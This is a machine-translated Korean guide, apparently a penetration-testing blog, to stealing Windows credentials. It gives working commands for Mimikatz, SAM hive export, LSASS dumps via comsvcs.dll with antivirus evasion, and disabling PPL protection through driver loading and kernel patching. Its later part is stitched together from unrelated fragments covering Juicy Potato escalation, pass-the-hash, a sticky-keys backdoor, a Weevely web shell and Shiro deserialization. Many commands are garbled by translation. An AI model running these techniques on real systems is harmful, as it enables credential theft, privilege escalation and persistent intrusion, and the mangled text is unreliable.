현재 기계의 일반 텍스트 비밀번호를 받으십시오
도메인 해시를 내보내기 전에 먼저 현재 컴퓨터의 로컬 해시 비밀번호를 내보내려고 노력할 수 있습니다. 도메인 사용자가 이전 에이 컴퓨터에 로그인하는 경우 도메인 사용자 또는 도메인 관리자의 계정을 직접 얻을 수 있습니다.
Windows 운영 체제에서 SAM 데이터베이스 (C: \ Windows \ System32 \ Config \ Sam)는 로컬 사용자의 해시를 저장합니다.
로컬 인증 프로세스에서 로컬 보안 권한 서비스 프로세스 lsass.exe도 메모리 (DMP 파일)의 사용자 비밀번호를 캐시합니다.
따라서 현재 기계의 해시를 크롤링하는 두 가지 방법 인 온라인 도구 추출 및 오프라인 분석 추출을 고려할 수 있습니다.
참고 : Windows 10 \ 2012R2 이후의 시스템 버전에서 시스템 사용자의 일반 텍스트 암호는 기본적으로 메모리 캐시에서 비활성화됩니다. 현재 Mimikatz를 사용하여 일반 텍스트를 잡을 수 있으며, 확실히 그것을 잡을 수 없습니다. 비밀번호 필드 숫자는 NULL로 직접 표시됩니다.
여기서는 일반 텍스트를 저장하기 위해 레지스트리를 수동으로 수정하여 크롤링 할 수 있습니다. (수정 후 로그인하기 전에 사용자에서 로그 아웃해야합니다)
reg 추가 hklm \\ system \\ currentControlset \\ Control \\ securityproviders \\ wdigest /v Uselogoncredential /t reg \ _dword /d 1 /f
Mimikatz
Mimikatz는 Frenchman Benjamin이 개발 한 강력한 경량 디버깅 도구입니다. 개인 테스트를위한 것이지만 강력한 기능으로 인해 Windows XP-2012와 같은 운영 체제의 일반 텍스트 암호를 직접 읽을 수 있으며 침투 테스트로 유명합니다. 그것은 침투에 필요한 도구라고 할 수 있습니다.
다운로드 주소 : https://github.com/gentilkiwi/mimikatz
1. 레지스트리를 통한 크롤링 해시
현재 시스템 레지스트리의 SAM 및 시스템 파일을 얻기 위해 명령 줄을 실행하십시오 (지역 관리자 권한 필요).
reg save hklm \\ system sys.hiv
reg save hklm \\ sam sam.hiv
파일을 얻은 후 파일을 공격자의 기본 컴퓨터로 다운로드하고 Mimikatz를 사용하여 오프라인 해시를 분석하고 추출 할 수 있습니다.
mimikatz.exe 'lsadump:sam /sam:sam.hiv /system:sys.hiv' 'exit'
이 방법은 SAM 파일에 저장된 로컬 사용자의 계정 만 얻을 수 있습니다.
2. Mimikatz를 대상 기계에 업로드하고 로컬 SAM 파일에 저장된 계정 해시 값을 추출하십시오.
권한 3:debug
TOKEN3:3360ELEVATE
LSADUMP3:SAM
3. 해시를 lsass.exe의 메모리에서 확장하십시오
Mimikatz 'Privilege:debug' 'Sekurlsa:LogonPasswords Full' 'Exit'
로컬 사용자에게 로그인 한 도메인 관리자의 해시 값이 로컬 사용자의 관리자 권한을 사용하여 캡처 한 것으로 나타났습니다.
pwdump7
pwdump7.exe를 직접 실행하십시오
wec
대상 기계에 업로드하고 매개 변수를 추가하여 직접 실행하십시오.
-L 로그인 세션 및 NTLM 자격 증명 (기본값)
-S 현재 로그인 세션 매개 변수의 NTLM 자격 증명 수정 : 사용자 이름 : DomainName :LM HASH :NT HASH
-R 정기적으로 로그인 세션 및 NTLM 자격 증명을 나열합니다. 새 세션이 발견되면 5 초마다 다시 되풀이됩니다.
-C 특수 NTML 자격 증명 매개 변수로 새 세션을 실행합니다.
-E 로그인 세션 및 NTLM 자격 증명을 수시로 나열하고 로그인 이벤트가 생성 될 때 한 번 다시 릴리스트
-o 모든 출력을 파일 매개 변수에 저장 : 파일 이름
-현재 로그인 세션 매개 변수 :을 사용하는 대신 루드를 지정합니다.
-D 로그인 세션 매개 변수 :에서 NTLM 자격 증명을 삭제합니다
-주소 매개 변수 : 주소를 사용합니다
-F Force Safe Mode
-G LM 및 NT 매개 변수 암호에 대한 해시를 생성합니다
-K 캐시 Kerberos 파일 (Unix 및 Windows WCE 형식) 티켓
-K 파일에서 Kerberos 티켓을 읽고 Windows 캐시에 삽입하십시오.
-W 다이제스트 인증을 통해 일반 텍스트 비밀번호를 캐시합니다
-V 상세한 출력
라자네
다운로드 주소 : https://github.com/alessandroz/lazagne
Lazagne.exe 모두
SharpDump
https://github.com/ghostpack/sharpdump
직접 컴파일하면됩니다
./sharpdump
lsasssilentprocessexit
https://mp.weixin.qq.com/s/8uer5DNAQS24KUKXU5YI9W
침묵 프로세스 출구, 즉 조용히 종료됩니다. 이 디버깅 기술은 werfault.exe 프로세스를 도출 할 수 있으며,이 프로세스는 프로그램을 실행하거나 모든 프로세스의 메모리 파일 또는 팝업을 재배치하는 데 사용할 수 있습니다.
주로 LSASSSILENTPROCESSEXIT API를 사용합니다. LEGISTION + 원격 프로세스 분사 및 관련 레지스트리 키 값을 수정하여 메모리를 덤프합니다.
#define ifeo \ _reg \ _key '소프트웨어 \\\\\ microsoft \\\\\\ Windows nt \\\\\ currentVersion \\\\\ execution 옵션 \\\\\'
#define silent \ _process \ _exit \ _reg \ _key '소프트웨어 \\\\\\ Microsoft \\\\\ Windows nt \\\\\ currentversion \\\\\ silentProcessexit \\\\\\'
원격 프로세스 주입을 사용하여 lsass.exe가 rtlreportsilentprocessexit 기능 자체를 호출하십시오.
hmodule hntdll=getModule Handle (l 'ntdll.dll');
rtlreportSilentProcessExit \ _func rtlreportSilentProcessExit=(rtlReportSilentProcessExit \ _func) getProcadDress (hntdll, 'rtlreportSilentProcessExit');
hthread=createremotethread (hprocess, null, 0, (lpthread \ _start \ _routine) rtlreportSilentProcessExit, (lpvoid) -1, null, null);
그러나 레지스트리를 수정해야하므로 소프트 킬링 환경을 우회하는 것은 거의 불가능합니다.
lsasssilentprocessexit.exe 616 0
민감한 환경에서 LSASS 프로세스를 덤프하는 방법
파일없이 PowerShell을 사용하여 파일없이 내보내십시오
https://blog.csdn.net/chenfeng857/article/details/120126818
https://xz.aliyun.com/t/12157#toc-9
comsvcs.dll, 시스템과 함께 제공됩니다. comsvcs.dll의 내보내기 함수 Minidump를 통해 덤프 메모리를 구현하십시오.
지정된 프로세스 메모리 파일을 덤프 할 때는 SedeBugPrivilege 권한이 필요합니다. 관리자 권한의 CMD에 따라 SedeBugPrivilege 권한은 기본적으로 지원되지만 상태는 비활성화됩니다.
CMD에서 rundll32 명령을 직접 실행하고 지정된 프로세스 메모리 파일을 덤프하려고하면 sedebugprivilege 권한을 활성화 할 수 없으므로 덤프가 실패합니다.
그러나 관리자 권한이있는 PowerShell에서는 SedeBugPrivilege 권한이 기본적으로 지원되며 상태가 활성화됩니다.
먼저 lsass.exe 프로세스 PID를 확인하십시오
작업 목록 | findstr lsass.exe
rundll32.exe comsvcs.dll minidump pid 경로 가득
rundll32.exe comsvcs.dll minidump 1096 c: \\ users \\ 16229 \\ goodtop \\ 1.dmp full
직접 실행하면 소프트를 죽임으로써 가로 채워질 수 있습니다.
그것을 우회하는 간단한 방법 :
Copycomsvcs.dll to In Insensitive Directories 및 무작위로 명명 된 Test.dll
C: \\ Windows \\ System32 \\ comsvcs.dll test.dll을 복사하십시오
rundll32.exe c: \\ users \\ 16229 \\ goodtop \\ code \ _java \\ test.dll minidump 1096 c: \\ users \\ 16229 \\ goodtop \\ code \ _java \\ 3.dmp full
로컬로 드래그하고 분석을 위해 Mimikatz를 사용하십시오.
Mimikatz.exe log 'Sekurlsa3333:minidump 2.dmp' 'sekurlsa333:logonpasswords Full'Exit
runasppl이 활성화 된 환경에서
https://www.freebuf.com/articles/system/332506.html
https://xz.aliyun.com/t/12157#toc-19
Mimikatz
PPL 보호 기능을 사용하여 관리자조차도 LSASS 프로세스를 열 수 없습니다.
Mimikatz 'Privilege:debug' 'Sekurlsa:LogonPasswords Full' 'Exit'
Mimikatzprivilege:debug의 명령이 성공적으로 활성화되었습니다. sedebugprivilege이지만 명령 sekurlsa333:0logonpasswords가 실패하고 오류 코드0x00000005가 나타납니다. Minikatz 코드 kuhl_m_sekurlsa_acquirelsa () 함수에서 간단히 이해할 수 있습니다.
hdata=null을 처리합니다.
dword pid;
dword processrights=process_vm_read | Process_Query_Information;
kull_m_process_getprocessidforname (l 'lsass.exe', pid);
hdata=OpenProcess (processrights, false, pid);
if (hdata hdata!=invalid_handle_value) {
//OpenProcess OK 인 경우
}
또 다른 {
print_error_auto (메모리 핸들);
}
프로세스 탐색기를 사용하여 LSASS 프로세스를 열어 볼 수있게되면 액세스가 거부됩니다.
Mimikatz의 디지털 서명 드라이버를 사용하여 커널의 프로세스 객체에 대한 보호 플래그를 제거하십시오.
Minikatz 설치 드라이버
권한 3:debug
!+
보호 삭제
! ProcessProtect /Process:lsass.exe /제거
그런 다음 비밀번호를 버릴 수 있습니다
Sekurlsa:LogonPasswords
도구를 사용하여 보호가 삭제 된 것을보십시오.
mimikatz.exe 'privilege:debug' '!+' '! ProcessProtect /Process3:lsass.exe /제거' 'Sekurlsa33333:LogonPasswords'exit '
pplkiller
https://www.cnblogs.com/revercc/p/16961961.html
https://redcursor.com.au/bypassing-lsa-protection-aka-protected-process-light-withoutmimikatz-on-windows-10/
우선 순위 차이 : PP는 시그니처 레벨이 더 크거나 동일하다면 전체 액세스 권한으로 PP 또는 PPL을 열 수 있습니다. PPL은 서명 수준이 높거나 같으면 전체 액세스 권한으로 다른 PPL을 열 수 있습니다. 시그니처 레벨에 관계없이 PPL은 전체 액세스 권한이있는 PP를 열 수 없습니다.
PPL이 활성화되면 더 높은 보호 수준에서 실행되는 프로세스 만 보호 된 프로세스에서 작동 할 수 있습니다.
Windows 커널은 _eprocess 구조를 사용하여 커널 메모리의 프로세스를 나타냅니다. 여기에는 유형 (_ps_protected_type) 및 서명자 (_ps_protected_signer) 속성을 통해 프로세스의 보호 수준을 정의하는 _ps_protection 필드가 포함됩니다.
typedef struct _ps_protection {
연합 {
uchar 레벨;
구조 {
UCHAR 유형 : 3;
Uchar Audit : 1; //예약된
Uchar Signer : 4;
};
};
} ps_protection, *pps_protection;
구조물로 표시되지만 모든 정보는 단일 바이트의 두 개의 니블 (leveles a uchar, signed char)에 저장됩니다. 처음 3 자리는 보호 유형을 나타냅니다 (아래 ps_protected_type 참조). 프로세스가 PP 또는 PPL인지 정의합니다. 마지막 4 자리는 서명자 유형 (아래 PS_Protected_Signer 참조), 즉 실제 보호 수준을 나타냅니다.
typedef enum _ps_protected_type {
psprotectedTypenone=0,
psprotectedTyPepRotectedlight=1,
psprotectedTyPeprotected=2
} ps_protected_type, *pps_protected_type;
typedef enum _ps_protected_signer {
psprotectedSignerNone=0, //0
psprotectedSignerauthenticode, //1
psprotectedSignerCodeGen, //2
psprotectedSignerantimalware, //3
psprotectedSignerlsa, //4
psprotectedSignerWindows, //5
psprotectedSignerwintcb, //6
psprotectedSignerWinsystem, //7
psprotectedSignerApp, //8
psprotectedSignerMax //9
} ps_protected_signer, *pps_protected_signer;
LSA 보호를 우회하려면 eprocess 커널 구조를 패치하여 LSASS 프로세스의 PPL 플래그를 비활성화 할 수 있습니다. 이를 위해서는 LSASS eprocess 구조의 주소와 패치 5 값을 찾아야합니다.
EnumDevedIvers 기능은 커널베이스 주소를 누출하는 데 사용될 수 있습니다. 이것은 시스템 프로세스의 eprocess 구조를 가리키는 psinitialsystemprocess를 찾는 데 사용될 수 있습니다. 커널은 링크 된 목록에 프로세스를 저장하므로 Eprocess 구조의 ActiveProcessLinks를 사용하여 링크 된 목록을 반복하고 LSASS를 찾을 수 있습니다.
eprocess 구조를 살펴보면 패치해야 할 5 개의 필드가 일반적으로 4 바이트로 정렬되어 있음을 알 수 있습니다. 이를 통해 다음과 같이 단일 4 바이트 쓰기로 eprocess 구조를 패치 할 수 있습니다.
주소를 찾은 후이 4 바이트의 값을 0으로 패치하십시오.
pplkiller.exe /installdriver
작업 목록 | findstr lsass.exe
pplkiller.exe /disableppl 688
다른 커널 버전을 만나면 프로그램이 4 바이트를 올바르게 패치 할 수 없으므로 동일한 버전의 컴퓨터를 찾아 LSASS 커널 주소를 WINDBG 디버깅을 통해 볼 수 있습니다.
bcdedit/debug onsrv \*https://msdl.microsoft.com/다운로드/기호
.Reload
! 프로세스 0 0 LSASS.EXE
dt \ _eprocess
주소0x6c0을 찾고 스크립트를 수정 한 다음 컴파일하십시오.
ppldump
https://itm4n.github.io/the-end-of-ppldump/
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/
PplDump는 C/C ++로 작성된 도구로 사용자 상태 취약성 착취를 구현하여 관리자로서 PPL에 임의 코드를 주입합니다. 이 기술은 Alex Ionescu와 James Forshaw가 보호 프로세스 (PP 및 PPL)에 대한 심층적 인 연구를 수행하는 많은 연구 결과 중 하나입니다.
ppldump의 작동 원리는 다음과 같습니다.
AP에 전화하십시오
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
한 번의 주입
32 비트 만 읽을 수 있기 때문에 서브 스트링을 사용하여 별도로 읽습니다.
편안한 느낌이 들었습니다. 이제 들어가서 속옷을 공개적으로 선택할 수 있습니다.
INURL:A.com 관리자
는 재설정 된 것 같습니다
OK 방금 문장을 작성하십시오
0x03 라이센스 
권한은 약간 낮습니다
MySQL을 사용하는 다른 방법은 없습니다.
MySQL 권리를 높이려고 노력하십시오
업로드 할 수없는 디렉토리를 제외하고 다른 모든 조건이 충족되므로 CS, PowerShell Online으로 이동하십시오.
자세한 내용은 Juicy Potato를 사용하십시오. Sanhao 학생들의 기사를 참조하십시오. 원하는 clsid를 선택하십시오. 링크
그러면 우리는 시스템 권한으로 PowerShell을 실행하고 있습니다
0x04 수평 침투 
은 작업 그룹 환경이며 0.9를 스캔하며 웹이기도합니다. 다음은 해시 패스이며 해시를 잡기 위해 직접 전송됩니다. 현재 다음 계정이 있습니다
웹이어야하는 데모, 그리고 0.7은 데이터베이스 서버 일 수 있습니다.
그런 다음 System.Exe를 업로드하고 Shell SelectMyparent.exe System.exe 500을 실행하십시오.
이 단계는 실제로 단어 수를 구성하는 것입니다.
스티커 키는 동시에 두 개 이상의 키를 누르는 데 어려움이있는 사람들을 위해 설계된 컴퓨터에 사용되는 바로 가기 키를 나타냅니다. 끈적 끈적한 본드의 주요 기능은 시프트와 다른 키의 조합을 용이하게하는 것입니다. 스티커 키는 먼저 (예 : Shift)를 누르고 다른 키를 동시에 누르는 대신 다른 키를 누르지 않고 물리적 인 이유로 인해 여러 키를 동시에 누를 수없는 일부 사람들에게 편리합니다. 일반적인 컴퓨터는 시프트를 5 번 누를 때 끈적 끈적한 키 프롬프트가 있습니다.
그런 다음 전체 제어로 수정하십시오.
이제 우리는 5 번 연속으로 교대를 누르고 시스템 권한 CMD가 팝업됩니다.
주입 백도어 등록
계획 작업의 백도
Web Backdoor, Weevely를 사용하여 Shell.php를 생성하여 테스트 할 수 있습니다.
파일을 서버 디렉토리에 넣고 실행하십시오.
내장 명령을 보급하십시오
원래 링크에서 재 인쇄 : https://mp.weixin.qq.com/s?__biz=mzg2ndywmda1na==mid=mid=22474826idx=2SN=8F11B7CC12F6C5DFBB5eeeeb316f14f460ch KSM=CE67A31BF9102A0D70487584DC3C49141A376CC1B35C0659F3AE72BAA7E77E6DE7E0F916DB5SCENE=21#WECHAT_REDIGRECT
Repemerme=deleteme 필드를보고 Shiro Deserialization 취약성 
가 있다고 말할 수 있습니다.
을 시작하십시오
을 엽니 다
를 선택하십시오
로 표시됩니다
를 선택하십시오
를 통과하는 모든 트래픽을 수동적으로 스캔하십시오.
然后,我有发现有个参数之前没测试,那就试一下吧
